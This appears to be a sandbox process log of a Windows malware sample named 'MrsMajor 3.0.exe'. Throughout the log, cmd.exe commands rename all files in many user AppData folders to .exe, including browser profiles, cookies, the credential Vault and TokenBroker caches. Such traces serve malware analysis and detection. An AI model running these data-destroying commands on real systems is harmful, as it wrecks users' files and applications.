"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Cyrl-RS\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sr-Latn-RS\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sv\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sw\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\te\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tg\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\th\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ti\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tk-TM\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tn-ZA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tt\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ug\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uk\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ur\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\uz-Latn-UZ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vi\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\wo\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\xh-ZA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\yo-NG\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-CN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-TW\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zu-ZA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\de\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\es\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\hu\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\it\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ja\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ko\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\nl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pl\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-BR\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\pt-PT\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\ru\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\sv\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\tr\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-CN\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\zh-TW\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick.2\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls.2\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Extras\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Layouts\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Templates.2\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Window.2\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\Flat\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\setup\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\setup\logs\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\Backup\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\Desktop\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\InPrivate\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\Internet Explorer\InPrivate\Desktop\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\UserProfileRoaming\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\0\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\AppCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\CloudStore\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatUaCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IEDownloadHistory\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\RoamingTiles\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\SettingSync\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*" "*.exe"
C:\Users\Admin\Downloads\MrsMajor 3.0.exe
"C:\Users\Admin\Downloads\MrsMajor 3.0.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\AppCache\R8RIK1HY\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\NotifyIcon\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012023022020230221\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatCache\Low\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\IECompatUaCache\Low\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.IE5\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Low\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Virtualized\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\1IYUAPIF\*.*" "*.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\S1Q31HZS\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TUIJN6ZA\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YYL8D8JJ\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DNTException\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\ESE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\Low\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\DNTException\Low\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE\Low\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Notifications\wpnidm\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Backup\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.Admin\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\cache2\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\safebrowsing\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\settings\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\startupCache\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\thumbnails\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\cache2\doomed\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\cache2\entries\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\settings\main\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\settings\main\ms-language-packs\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\settings\main\ms-language-packs\browser\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\3o4pebi0.default-release\settings\main\ms-language-packs\browser\newtab\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\ActiveSync\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\E2A4F912-2574-4A75-9BB0-0D023378592B_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.VCLibs.140.00_8wekyb3d8bbwe\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CallingShellApp_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CapturePicker_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\*.*" "*.exe"
C:\Windows\System32\cmd.exe
